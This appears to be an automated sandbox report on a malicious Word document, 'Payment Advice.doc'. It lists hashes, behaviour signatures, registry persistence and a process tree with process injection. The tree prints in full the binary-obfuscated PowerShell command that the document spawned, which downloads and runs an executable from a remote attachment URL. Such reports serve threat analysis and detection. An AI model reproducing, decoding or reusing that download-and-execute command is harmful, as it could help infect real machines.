Analysis
- max time kernel: 289s
- max time network: 291s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 15-07-2021 20:14

Static task: static1

Behavioral task: behavioral1
- Sample: Payment Advice.doc
- Resource: win7v20210408

Behavioral task: behavioral2
- Sample: Payment Advice.doc
- Resource: win10v20210410

General
- Target: Payment Advice.doc
- Size: 217KB
- MD5: a1bb900ae8003b924f333442c4117a84
- SHA1: 126cd9e2de926ade2cdb20fb8d2a059b7786fde6
- SHA256: 9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80
- SHA512: c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
  Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 564 | 1820 | powershell.exe | WINWORD.EXE

Blocklisted process makes network request (1 IoC)
Processes (flow | pid | process):
  7 | 564 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
Processes (pid | process):
  296 | winint.exe

Loads dropped DLL (2 IoCs)
Processes (pid | process):
  564 | powershell.exe
  564 | powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kajscxo = "C:\\Users\\Public\\Libraries\\oxcsjaK.url" | winint.exe

Drops file in Windows directory (1 IoC)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoC)
Processes (pid | pid_target | process | target process):
  1540 | 300 | WerFault.exe | dialer.exe

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings (heading recovered from the WINWORD.EXE entry in the process tree below; the registry entries are the ones the report lists)
Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid | process):
  1820 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes (pid | process):
  564 | powershell.exe
  564 | powershell.exe
  1540 | WerFault.exe
  1540 | WerFault.exe
  1540 | WerFault.exe
  1540 | WerFault.exe
  1540 | WerFault.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 564 | powershell.exe
  Token: SeDebugPrivilege | 1540 | WerFault.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
Processes (pid | process):
  1820 | WINWORD.EXE
  1820 | WINWORD.EXE
  1820 | WINWORD.EXE

Suspicious use of WriteProcessMemory (32 IoCs)
Processes (description | pid | process | target process | count of identical entries):
  PID 1820 wrote to memory of 564 | 1820 | WINWORD.EXE | powershell.exe | 4
  PID 564 wrote to memory of 296 | 564 | powershell.exe | winint.exe | 4
  PID 296 wrote to memory of 300 | 296 | winint.exe | dialer.exe | 16
  PID 300 wrote to memory of 1540 | 300 | dialer.exe | WerFault.exe | 4
  PID 1820 wrote to memory of 1380 | 1820 | WINWORD.EXE | splwow64.exe | 4
Processes (tree; indentation shows parent/child depth)

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\winint.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\winint.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\dialer.exe
        Command line: C:\Windows\System32\dialer.exe
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 148
          - Program crash
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

  C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\winint.exe (the report lists the same file four times, also under the path \Users\Admin\AppData\Local\Temp\winint.exe; all entries carry identical hashes)
  MD5: 36f250cb265a9ea1e50697c0def52aa8
  SHA1: ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3
  SHA256: eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514
  SHA512: ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56
Memory dumps (path | filesize)
- memory/296-94-0x0000000000220000-0x0000000000221000-memory.dmp | 4KB
- memory/296-91-0x0000000000000000-mapping.dmp
- memory/300-103-0x0000000000150000-0x0000000000151000-memory.dmp | 4KB
- memory/300-104-0x0000000010590000-0x000000001060D000-memory.dmp | 500KB
- memory/300-101-0x0000000000080000-0x0000000000081000-memory.dmp | 4KB
- memory/300-102-0x0000000000100000-0x0000000000101000-memory.dmp | 4KB
- memory/300-97-0x0000000000000000-mapping.dmp
- memory/564-88-0x00000000066F0000-0x00000000066F1000-memory.dmp | 4KB
- memory/564-66-0x00000000047C0000-0x00000000047C1000-memory.dmp | 4KB
- memory/564-79-0x000000007EF30000-0x000000007EF31000-memory.dmp | 4KB
- memory/564-80-0x0000000006460000-0x0000000006461000-memory.dmp | 4KB
- memory/564-87-0x0000000006300000-0x0000000006301000-memory.dmp | 4KB
- memory/564-63-0x0000000000000000-mapping.dmp
- memory/564-73-0x0000000005730000-0x0000000005731000-memory.dmp | 4KB
- memory/564-70-0x0000000005240000-0x0000000005241000-memory.dmp | 4KB
- memory/564-69-0x0000000004750000-0x0000000004751000-memory.dmp | 4KB
- memory/564-68-0x0000000000A32000-0x0000000000A33000-memory.dmp | 4KB
- memory/564-67-0x0000000000A30000-0x0000000000A31000-memory.dmp | 4KB
- memory/564-78-0x0000000006180000-0x0000000006181000-memory.dmp | 4KB
- memory/564-65-0x0000000000B40000-0x0000000000B41000-memory.dmp | 4KB
- memory/1380-106-0x0000000000000000-mapping.dmp
- memory/1380-107-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp | 8KB
- memory/1540-99-0x0000000000000000-mapping.dmp
- memory/1540-105-0x0000000002300000-0x0000000002301000-memory.dmp | 4KB
- memory/1820-59-0x00000000729D1000-0x00000000729D4000-memory.dmp | 12KB
- memory/1820-62-0x0000000076641000-0x0000000076643000-memory.dmp | 8KB
- memory/1820-61-0x000000005FFF0000-0x0000000060000000-memory.dmp | 64KB
- memory/1820-60-0x0000000070451000-0x0000000070453000-memory.dmp | 8KB